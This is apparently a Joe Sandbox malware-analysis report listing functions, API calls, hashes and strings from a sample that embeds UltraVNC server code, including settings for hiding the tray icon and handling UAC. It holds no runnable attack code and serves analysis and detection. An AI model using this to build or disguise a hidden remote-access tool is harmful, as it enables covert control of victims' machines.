                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibraryMessageSend
                                                                            • String ID:
                                                                            • API String ID: 3583424976-0
                                                                            • Opcode ID: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
                                                                            • Instruction ID: 254c409203386ebe65b745d3afee3ca62374bce8c1e194b13087c4973494577e
                                                                            • Opcode Fuzzy Hash: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
                                                                            • Instruction Fuzzy Hash: 05113025F0A55145FF99EFA194616B86770AFA4B4EF040531CE8E93741CF9CE4A4C711
                                                                            Function 00007FF6C2BECBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketsetsockoptshutdownsocket
                                                                            • String ID:
                                                                            • API String ID: 3513852771-0
                                                                            • Opcode ID: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
                                                                            • Instruction ID: aad6cea1f8b6f514d42f1f222bdf67727d59b22a133f4d2595c4818e450a853e
                                                                            • Opcode Fuzzy Hash: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
                                                                            • Instruction Fuzzy Hash: CEF0CDB2A1824787EB109F34D8103B57360BF4270EF140674DEA8C63D0DFBEE1898A80
                                                                            Function 00007FF6C2BED170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: setsockopt
                                                                            • String ID:
                                                                            • API String ID: 3981526788-0
                                                                            • Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                            • Instruction ID: 83526699baf2bd5d48d5a87e4224cb846874aa09bf382dbc2faaddbcd3ab7ec2
                                                                            • Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
                                                                            • Instruction Fuzzy Hash: C3F06DA5A1818383E7218F60D4042B5A361FB8571AF140A31DEEDCABD4CFFCD19A8B00
                                                                            Function 00007FF6C2BED1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CountTickselect
                                                                            • String ID:
                                                                            • API String ID: 2475007269-0
                                                                            • Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                            • Instruction ID: 06f5fda366942b572b71bcba2d70d5f29522e2f2af7c3a21682084234548238a
                                                                            • Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
                                                                            • Instruction Fuzzy Hash: 2931B37670464287EB04CF21E5841ED3762EB89F8DF098179CF8D8B789DEB8D54587A0
                                                                            Function 00007FF6C2C432EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(?,?,?,00007FF6C2C437F7,?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19), ref: 00007FF6C2C43331
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep_errno
                                                                            • String ID:
                                                                            • API String ID: 1068366078-0
                                                                            • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                            • Instruction ID: a590931ff874e5d1ae3cfb3cfc9762436cc2b4724f0523c58addd6268fa89ba2
                                                                            • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                            • Instruction Fuzzy Hash: 9301A722A24A8585EB949F17944007D77B1E7C4FD9B180131DFAD43790CF7CE851C700

                                                                            Non-executed Functions

                                                                            Function 00007FF6C2B881AD Relevance: 463.1, APIs: 192, Strings: 72, Instructions: 1063COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                                            • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                            • API String ID: 634683900-3478490838
                                                                            • Opcode ID: c0da5432a45c180c4d05b08e85982c191f6fb8bb6e384a189232e8bead3bb55d
                                                                            • Instruction ID: 9da6559bba2392185f5dd4fa5a9903d6146090937865c7787f3c1e2ee749de70
                                                                            • Opcode Fuzzy Hash: c0da5432a45c180c4d05b08e85982c191f6fb8bb6e384a189232e8bead3bb55d
                                                                            • Instruction Fuzzy Hash: A9E2A661618A8BE5EB90CF64E8905E43370FB5474EF905032DA8DC7668DEBDE24ED780
                                                                            Function 00007FF6C2B8E1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                                            • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                            • API String ID: 341937111-959611688
                                                                            • Opcode ID: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                            • Instruction ID: b35ca3b1ec15f057102c524d44ea44194f31bfe4537efaa998519cf3e71cc59d
                                                                            • Opcode Fuzzy Hash: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                            • Instruction Fuzzy Hash: 19C2D665A18A47E1EA808F51E8904B473B0FB5478EF905432DE8DD3728EEBDE24DD780
                                                                            Function 00007FF6C2B9A130 Relevance: 79.1, APIs: 28, Strings: 17, Instructions: 317threadregistrysleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                            • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                            • API String ID: 1732492099-311746058
                                                                            • Opcode ID: 02dbd923165e2a0b1fe8487735a84df805fed272564b20ac068a7f21ef945b6f
                                                                            • Instruction ID: f05d852e23b16035ac75d57c5400f03fab636844b9d9f3e014e4c9e848db9e50
                                                                            • Opcode Fuzzy Hash: 02dbd923165e2a0b1fe8487735a84df805fed272564b20ac068a7f21ef945b6f
                                                                            • Instruction Fuzzy Hash: 17F13831A08B8285EBA0EF21E8442A933B5FB5575EF444236CE9D87BA4DFBCE554C740
                                                                            Function 00007FF6C2B94C10 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 357windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
                                                                            • String ID: Chat with <%s> - UltraVNC$MS Sans Serif
                                                                            • API String ID: 3122538718-446500584
                                                                            • Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                            • Instruction ID: 0f8ed634c68795f1692ae6d25076ded72eb060dc20c768e49e48e7ea89f86be6
                                                                            • Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                            • Instruction Fuzzy Hash: B8F17E75A0864286EBA4DF26E4043A97371FB89B9EF104131DF8E87BA4CFBCE4558740
                                                                            Function 00007FF6C2B920E0 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 241sleeplibrarysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                                            • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                                            • API String ID: 767217470-2348971971
                                                                            • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                            • Instruction ID: 07292fce0415702578586ed3a586aafeb73acfa2ea400ac5d92081daefcf738d
                                                                            • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                            • Instruction Fuzzy Hash: 74C14B24E09A4281EA94EF51E8542B933B4FF56BAEF444535CEDE923A0CFBCE455D340
                                                                            Function 00007FF6C2BAF980 Relevance: 65.1, APIs: 20, Strings: 17, Instructions: 347libraryloaderwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                                            • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                                            • API String ID: 3851920378-1343955350
                                                                            • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                            • Instruction ID: 31b23b3a329f58e9e195cc941db82945320485b9f34e3cef18c1d451e32ec5a3
                                                                            • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                            • Instruction Fuzzy Hash: 47024872A096C286EB50DF64D4406EA37A1FB86B4DF484436DE8D97798DFBDE005C720
                                                                            Function 00007FF6C2B98980 Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 264registrythreadlibraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
